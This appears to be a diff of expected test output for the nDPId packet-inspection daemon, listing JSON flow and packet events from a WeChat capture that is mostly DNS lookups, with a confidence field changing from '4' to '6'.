00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1492171268754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171268754,"pkt":"8IQvSpdgeJKcD6iOCABFAABIJm1AAEARj4LAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1654,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171268754,"flow_last_seen":1492171268754,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171268754,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43705,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1492171269383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171269383,"pkt":"8IQvSpdgeJKcD6iOCABFAABDJn9AAEARj3XAqAFnwKgB\/qwfADUALz4De5MBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1657,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1492171269383,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171269383,"pkt":"8IQvSpdgeJKcD6iOCABFAABDJoBAAEARj3TAqAFnwKgB\/qwfADUAL2b9N5kBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1658,"source":"wechat.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171269383,"flow_last_seen":1492171269383,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171269383,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44063,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00733{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1492171269548,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1492171269548,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwL\/IAAIARhLfAqAFkwKgB\/wCKAIoA3H89EQ7\/KMCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171269548,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1492171269750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492171269750,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJttAAEARjxjAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1492171270418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492171270418,"pkt":"8IQvSpdgeJKcD6iOCABFAAA9Ju1AAEARjw3AqAFnwKgB\/qZdADUAKRuahlUBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1492171273433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1492171273433,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJ9JAAEARjiTAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1492171273759,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171273759,"pkt":"8IQvSpdgeJKcD6iOCABFAABIKB1AAEARjdLAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1492171274388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492171274388,"pkt":"8IQvSpdgeJKcD6iOCABFAABHKHpAAEARjXbAqAFnwKgB\/qdoADUAMwYVU1YBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwNsYW4AAAEAAQ=="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1492171274388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492171274388,"pkt":"8IQvSpdgeJKcD6iOCABFAABHKHtAAEARjXXAqAFnwKgB\/qdoADUAMwU2OTUBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwNsYW4AABwAAQ=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1492171274755,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171274755,"pkt":"8IQvSpdgeJKcD6iOCABFAABIKKBAAEARjU\/AqAFnwKgB\/q06ADUANGSfuxkBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1492171290232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMahAAEARhEzAqAFnwKgB\/qMfADUAL3l8SRkBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMalAAEARhEvAqAFnwKgB\/qMfADUAL1ZyUSMBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"} 